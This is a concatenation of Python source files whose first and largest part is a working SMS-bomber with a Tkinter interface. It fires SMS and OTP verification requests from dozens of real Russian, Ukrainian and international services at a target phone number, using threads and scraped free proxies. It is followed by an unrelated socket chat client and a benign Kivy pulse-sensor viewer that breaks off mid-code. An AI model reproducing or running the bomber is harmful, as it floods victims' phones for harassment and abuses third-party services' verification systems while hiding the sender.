= '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11] _phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _text = 'Ляля' phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10] phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10] try: requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407'), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://plink.tech/register/', json={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post(('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/'), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main&currentLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post(('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11]), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy())) good() except Exception as e: error() try: requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone}, proxies=(proxy())) good() except Exception as e: error() try: a = requests.get('https://driver.gett.ru/signup/', proxies=(proxy())) requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'}, proxies=(proxy())) good() except Exception as e: error() try: b = requests.session() b.get('https://drugvokrug.ru/siteActions/processSms.htm', proxies=(proxy())) requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'}, proxies=(proxy())) good() except Exception as e: error() try: rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]}, proxies=(proxy())) good() except Exception as e: error() try: rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone}, proxies=(proxy())) good() except Exception as e: error() try: psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'}, proxies=(proxy())) good() except Exception as e: error() try: beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone}, proxies=(proxy())) good() except Exception as e: error() try: modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'}, proxies=(proxy())) good() except Exception as e: error() try: data = {'form[NAME]':'Иван', 'form[PERSONAL_GENDER]':'M', 'form[PERSONAL_BIRTHDAY]':'11.02.2000', 'form[EMAIL]':'fbhbdfvbd@gmail.com', 'form[LOGIN]':phone1, 'form[PASSWORD]':None, 'get-new-password':'Получите пароль по SMS', 'user_agreement':'on', 'personal_data_agreement':'on', 'formType':'full', 'utc_offset':180} aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data, proxies=(proxy())) good() except Exception as e: error() try: tvzavr = requests.post(('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49'), proxies=(proxy())) good() except Exception as e: error() try: cook = requests.post('https://www.netprint.ru/order/profile', proxies=(proxy())) headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection':'keep-alive', 'Content-Length':145, 'Cookie':'unbi=' + cook.cookies['unbi'], 'Host':'www.netprint.ru', 'Origin':'https://www.netprint.ru', 'Referer':'https://www.netprint.ru/order/profile', 'Sec-Fetch-Mode':'cors', 'Sec-Fetch-Site':'same-origin', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48', 'X-Requested-With':'XMLHttpRequest'} netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en'), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone', 'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone, 'SignupForm[device_type]':3}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone, 'locale':'en', 'countryCode':'ru', 'version':'1', 'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request', 'phone':'+' + phone, 'phone_permission':'unknown', 'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown', 'devicemodel':'unknown'}, proxies=(proxy())) good() except Exception as e: error() try: password = ''.join(random.choice(string.ascii_letters) for _ in range(6)) requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.get(('https://findclone.ru/register?phone=+' + phone), proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone}, proxies=(proxy())) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy())) good() except Exception as e: error() class Queue: def __init__(self): self.queue = [] def get(self): if self.qsize() != 0: return self.queue.pop() def put(self, item): if item not in self.queue: self.queue.append(item) def qsize(self): return len(self.queue) def __str__(self): return str(self.queue) class Proxy: def __init__(self): self.anony_proxis = 'https://free-proxy-list.net/anonymous-proxy.html' self.new_proxies = 'https://free-proxy-list.net' self.socks_proxies = 'https://socks-proxy.net' self.ssl_proxies = 'https://sslproxies.org' self.qproxy = None self.psize = 0 self.country = None self.port = None def fetch(self, url): proxies = bs(get(url).text, 'html.parser').find('tbody').findAll('tr') for proxy in proxies: pjson = self.parse(proxy.findAll('td')) if pjson: if self.psize: if self.qproxy.qsize() < self.psize: self.qproxy.put(pjson) else: break else: self.qproxy.put(pjson) def parse(self, proxy): pjson = {'ip':proxy[0].string, 'port':proxy[1].string, 'anonymity':proxy[4].string, 'country':proxy[3].string, 'updated':proxy[7].string, 'https':proxy[6].string} if all([self.country, self.port]): if pjson['country'] == self.country: if pjson['port'] == self.port: return pjson elif self.port: if self.port != pjson['port']: return return pjson elif self.country: if self.country != pjson['country']: return return pjson else: return pjson def scrape(self, size=None, port=None, country=None, new_proxies=False, anony_proxies=False, socks_proxies=False, ssl_proxies=False): self.port = str(port) if port else None self.country = country self.qproxy = Queue() self.psize = size if new_proxies: self.fetch(self.new_proxies) if anony_proxies: self.fetch(self.anony_proxies) if socks_proxies: self.fetch(self.socks_proxies) if ssl_proxies: self.fetch(self.ssl_proxies) proxies = self.qproxy self.qproxy = Queue() return proxies def download(): prx = Proxy() proxies = prx.scrape(new_proxies=True, size=10) f = open('proxy.txt', 'w') while 1: if proxies.qsize(): proxy = proxies.get() f.write('http socks5://' + proxy['ip'] + ':' + proxy['port'] + '\n') f.close() messagebox.showinfo(title='Proxy загружены', message=('Путь к файлу: ' + os.path.dirname(os.path.abspath(__file__)) + '\\proxy.txt')) var = IntVar() check = Checkbutton(root, text='Использовать PROXY', variable=var, onvalue=1, offvalue=0) check.pack() check.place(x=350, y=50) def StartThread(): number = text1.get('1.0', 'end') try: thrade = int(text2.get('1.0', 'end')) except: messagebox.showinfo(title='Warning', message='Не корректный формат потоков') try: if thrade > 20: messagebox.showinfo(title='Warning', message='Слишком большое количество потоков') except: pass if var.get() == 1: spam = spamProxy try: if file_name == None: pass except: messagebox.showinfo(title='Warning', message='Не указан файл с proxy') try: if len(number) < 12 or file_name == None: messagebox.showinfo(title='Warning', message='Недостаточно цифр') else: messagebox.showinfo(title='GOOD', message='Спам запущен') for i in range(thrade): t = threading.Thread(target=spam, args=(number,)) t.start() except: pass else: spam = spamNOproxy if len(number) < 12: messagebox.showinfo(title='Warning', message='Недостаточно цифр') else: messagebox.showinfo(title='GOOD', message='Спам запущен') for i in range(thrade): t = threading.Thread(target=spam, args=(number,)) t.start() def fileopen(): global file_name file_name = fd.askopenfilename(filetypes=(('TXT files', '*.txt'), ('HTML files', '*.html;*.htm'), ('All files', '*.*'))) root.resizable(False, False) text1 = Text(root, height=1, width=15, font='Arial 14') text1.pack() text1.place(x=15, y=25) text2 = Text(root, height=1, width=2, font='Arial 14') text2.pack() text2.place(x=15, y=85) file = Button(text='Выбрать файл с proxy', command=fileopen) file.pack() file.place(x=15, y=120) file = Button(text='Загрузить proxy из интернета', command=download) file.pack() file.place(x=15, y=160) label1 = Label(text='Введите номер в формате 7XXXXXXXXXX', fg='#912700', bg='#849187') label1.pack() label1.place(x=15, y=55) label2 = Label(text='Потоки (не больше 20)', fg='#912700', bg='#849187') label2.pack() label2.place(x=50, y=90) crack = Button(text='Старт', height=2, width=12, background='green', command=StartThread) crack.pack() crack.place(x=215, y=235) root.mainloop()
client.py
#!/bin/python #DEVELOPED BY DEVILMASTER import sys, time, socket, threading, os os.system('clear') class colors: blue = '\033[94m' cyan = '\033[96m' green = '\033[92m' red = '\033[31m' pink = '\033[35m' banner = colors.cyan + """ _______ _____ ______ ___ ____ ____ __ ___ / ___/ // / _ /_ __/___/ _ \/ __ \/ __ \/ |/ / / /__/ _ / __ |/ / /___/ , _/ /_/ / /_/ / /|_/ / \___/_//_/_/ |_/_/ /_/|_|\____/\____/_/ /_/ [*] CHAT-ROOM - A SIMPLE CHAT SERVER [*] [*] DEVELOPED BY DEVIL MASTER [*] """ def slowprint(s): for c in s + '\n': sys.stdout.write(c) sys.stdout.flush() time.sleep(1 / 10) print(banner) slowprint(colors.pink + "[CONNECTING] Connecting to server..." ) slowprint(colors.green + "[CONNECTED] Connected to server...") nickname = input(colors.blue + "[+] Enter your username : ") client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = '127.0.0.1' port = 4444 client.connect((server, port)) def receive(): while True: try: message = client.recv(1024).decode('ascii') if message == 'NICKNAME': client.send(nickname.encode('ascii')) else: print(message) except: slowprint(bcolor.red + "[ERROR] An error occured!") client.close() break def write(): while True: message = '[{}] >> {}'.format(nickname, input('')) client.send(message.encode('ascii')) receive_thread = threading.Thread(target=receive) receive_thread.start() write_thread = threading.Thread(target=write) write_thread.start()
kivy_pulsesensor_viewer_demo.py
''' This example uses a Kivy Garden Graph package to draw Arduino pulse sensor data on a PC/phone screen. We use PySerial(PC) or usbserial4a(Android) to receive pulse sensor data from an Arduino board. To read more about this demo, visit: https://github.com/EveryWhereLab/kivy-pulsesensor-viewer-demo/. ''' import kivy kivy.require('1.8.0') from kivy.app import App from kivy.properties import ObjectProperty from kivy.uix.boxlayout import BoxLayout from kivy.uix.recycleboxlayout import RecycleBoxLayout from kivy.uix.popup import Popup from kivy.clock import Clock from kivy.utils import platform from kivy.properties import BooleanProperty from kivy.uix.label import Label from kivy.uix.recycleview import RecycleView from kivy.uix.recycleview.views import RecycleDataViewBehavior from kivy.uix.behaviors import FocusBehavior from kivy.uix.recycleview.layout import LayoutSelectionBehavior from kivy.uix.button import Button from plyer import orientation from queue import Queue import threading import re import time if platform == 'android': from usb4a import usb from usbserial4a import serial4a from usbserial4a import cdcacmserial4a else: from serial.tools import list_ports from serial import Serial, SerialException from kivy.garden.graph import Graph, MeshLinePlot from kivy.uix.popup import Popup from kivy.properties import ListProperty, StringProperty, ObjectProperty class SelectableRecycleBoxLayout(FocusBehavior, LayoutSelectionBehavior, RecycleBoxLayout): ''' Adds selection and focus behaviour to the view. ''' class SelectableLabel(RecycleDataViewBehavior, Label): ''' Add selection support to the Label ''' index = None selected = BooleanProperty(False) selectable = BooleanProperty(True) def refresh_view_attrs(self, rv, index, data): ''' Catch and handle the view changes ''' self.index = index return super(SelectableLabel, self).refresh_view_attrs( rv, index, data) def on_touch_down(self, touch): ''' Add selection on touch down ''' if super(SelectableLabel, self).on_touch_down(touch): return True if self.collide_point(*touch.pos) and self.selectable: return self.parent.select_with_touch(self.index, touch) def apply_selection(self, rv, index, is_selected): ''' Respond to the selection of items in the view. ''' self.selected = is_selected if is_selected: print("selection changed to {0}".format(rv.data[index])) rv.selectedItem = index else: print("selection removed for {0}".format(rv.data[index])) class RV(RecycleView): def __init__(self, **kwargs): super(RV, self).__init__(**kwargs) self.selectedItem = -1 self.device_name_list=[] def append_item(self, x) : self.device_name_list.append(x[0]) self.data.append({'text': str(x[1])}) def set_first_item_as_default(self): if len(self.data) > 0: self.selectedItem = 0 if len(self.view_adapter.views) > 0: self.view_adapter.views[self.selectedItem].selected = 1 def get_first_selected_device_name(self): if self.selectedItem in range(len(self.device_name_list)): return self.device_name_list[self.selectedItem] return None def clearAll(self): self.device_name_list.clear() self.selectedItem = -1 self.view_adapter.views.clear() self.data.clear() class PulseSensorViewerDemo(BoxLayout): def __init__(self): orientation.set_landscape() self.rx_temp_data = "" self.points = [(0,0)] self.samples = Queue(300) self.serial_port = None self.read_thread = None self.port_thread_lock = threading.Lock() super(PulseSensorViewerDemo, self).__init__() self.reading_thread_enabled = False self.is_asking_permission = False self.graph = self.ids.graph_plot self.plot = [] self.plot.append(MeshLinePlot(color=[1, 1, 0, 1])) # - Yellow self.reset_plots() for plot in self.plot: self.graph.add_plot(plot) self.do_schedule_scan_once() def reset_plots(self): for plot in self.plot: plot.points = [(0, 0)] self.counter = 1 def do_start_stop_toggle(self): if not self.reading_thread_enabled: # to open the serial port, start a reading thread, and schedule a drawing timer selected_device = self.ids.device_list.get_first_selected_device_name() if selected_device is not None: try: if platform == 'android': device = usb.get_usb_device(selected_device) if not device: raise SerialException( "Device {} not present!".format(selected_device) ) if not usb.has_usb_permission(device): if self.is_asking_permission != True: self.is_asking_permission = True usb.request_usb_permission(device) Clock.schedule_once(lambda dt: self.do_start_stop_toggle(),0.5) return self.is_asking_permission = False self.serial_port = serial4a.get_serial_port( selected_device, App.get_running_app().config.getint('communication', 'baud_rate'), App.get_running_app().config.getint('communication', 'data_bits'), App.get_running_app().config.get('communication', 'parity'), float(App.get_running_app().config.get('communication', 'stop_bits')), timeout=1 ) else: self.serial_port = Serial( selected_device, App.get_running_app().config.getint('communication', 'baud_rate'), App.get_running_app().config.getint('communication', 'data_bits'), App.get_running_app().config.get('communication', 'parity'), float(App.get_running_app().config.get('communication', 'stop_bits')), timeout=1 ) except SerialException: self.popup_a_notification("The selected device can not be configured.\r\nPlease check the permissions and close me!") if self.serial_port is not None and self.serial_port.is_open and not self.read_thread: self.serial_port.reset_input_buffer() self.read_thread = threading.Thread(target = self.read_serial_msg_thread) self.reading_thread_enabled = True self.read_thread.start() # Since there is a queue to adjust inconsistent throughputs, we can set a small time interval to check if sampes exist in queue . Clock.schedule_interval(self.draw_waveform, 1 / 50.) self.ids.toggle_button.text = "Stop acquisition" else: self.popup_a_notification("No device selected. Close me!") else: # to unschedule the drawing timer and stop the reading thread self.reset_plots() Clock.unschedule(self.draw_waveform) self.reading_thread_enabled = False with self.port_thread_lock: self.serial_port.close() self.read_thread.join() self.read_thread = None self.ids.toggle_button.text = "Start acquisition" def popup_a_notification(self, msg): # create content and add to the popup content = Button(text=msg) popup = Popup(title='Reminder', content=content, auto_dismiss=False) # bind the on_press event of the button to the dismiss function content.bind(on_press=popup.dismiss) # open the popup popup.open() def do_schedule_scan_once(self): Clock.schedule_once(self.scan_usb_devices,1/10) def scan_usb_devices(self,dt): self.ids.device_list.clearAll() device_node_list = [] r = lambda x: x if x is not None else '' if platform == 'android': usb_device_list = usb.get_usb_device_list() device_node_list = [ (device.getDeviceName(), r(device.getProductName()) + "(vid=" + str(device.getVendorId()) + ",pid=" + str(device.getProductId()) + ")" ) for device in usb_device_list ] else: usb_device_list = list_ports.comports() device_node_list = [(device.device, r(device.product) + "(vid=" + str(device.vid) + ",pid=" + str(device.pid) + ")") for device in usb_device_list] if len(device_node_list) > 0: for device in device_node_list: self.ids.device_list.append_item(device) Clock.schedule_once(self.set_first_item_as_default,1/10) def set_first_item_as_default(self, dt): self.ids.device_list.set_first_item_as_default() def draw_waveform(self,dt): update_size = self.samples.qsize() if update_size == 0: return if update_size > 200: # Just show latest samples. while(self.samples.qsize() > 200): self.samples.get() self.plot[0].points.clear() update_size = 200 self.counter = 0 else: old_samples_to_remove = self.counter + update_size - 200 if old_samples_to_remove > 0: # We re-write our points list if number of values exceed 200. # ie. Move each timestamp to the left. # We re-write our points list if number of values exceed 200. # ie. Move each timestamp to the left. for plot in self.plot: del(plot.points[0: old_samples_to_remove-1]) plot.points[:] = [(i[0] - old_samples_to_remove, i[1]) for i in plot.points[:]] self.counter = 200 - old_samples_to_remove points = [] for i in range(update_size): points.append((self.counter + i, int(self.samples.get()))) self.plot[0].points.extend(points) self.counter += update_size def get_lines(self, data): lines = [] self.rx_temp_data += data.decode("ascii") idx = self.rx_temp_data.rfind('\r\n') if idx > 0: lines = re.split(r'[\n\r]+', self.rx_temp_data) if idx == len(self.rx_temp_data): self.rx_temp_data = "" else: self.rx_temp_data = self.rx_temp_data[idx + 2:] return lines def read_serial_msg_thread(self): while self.reading_thread_enabled == True: try: with self.port_thread_lock: if not self.serial_port.is_open: break received_msg = self.serial_port.read(self.serial_port.in_waiting) if received_msg: lines = self.get_lines(received_msg) for line in lines: if len(line) < 1: continue if line[0] == 'S': # pluse sensor sample result = re.findall(r'\d+', line[1:] ) if len(result) > 0: self.samples.put(int(result[0])) elif line[0] == 'B': result = re.findall(r'\d+', line[1:] ) if len(result) > 0: self.ids.BPM_data.text = "BPM=" + result[0] elif line[0] == 'Q': result = re.findall(r'\d+', line[1:] ) if len(result) > 0: self.ids.IBI_data.text = "IBI=" + result[0] elif line[0] == 'T': # We add a temperature example here. If you have a temperature sensor, you can try to report temperature value with a prefix 'T' in your Arduino board. result = re.findall(r"[-+]?\d*\.\d+|\d+", line[1:]) if len(result) > 0: self.ids.Temperature_data.text = "Temperature=" + result[0] else: time.sleep(0.01) except Exception as ex: raise ex usb_serial_params_json = ''' [ { "type": "options", "title": "Baud rate", "section": "communication", "key": "baud_rate", "options": ["921600","460800","230400", "115200","57600","38400","19200","9600"] }, { "type": "options", "title": "Data bits", "section": "communication", "key": "data_bits", "options": ["8","7","6","5"] }, { "type": "options", "title": "Parity", "section": "communication", "key": "parity", "options": ["N","E","O"] }, { "type": "options", "title": "Stop bits", "section": "communication", "key": "stop_bits", "options": ["1","1.5","2"] } ] ''' class PulseSensorViewerDemoApp(App): def build(self): return PulseSensorViewerDemo() def build_config(self, config): """ Set the default values for the configs sections. """ config.setdefaults('communication', {'baud_rate' : 115200, 'data_bits' : 8, 'parity': 'N', 'stop_bits' : 1 }) def build_settings(self, settings): """ Add our custom section to the default configuration object. """ settings.add_json_panel('USB serial parameters', self.config, data=usb_serial_params_json) def on_pause(self): return True def 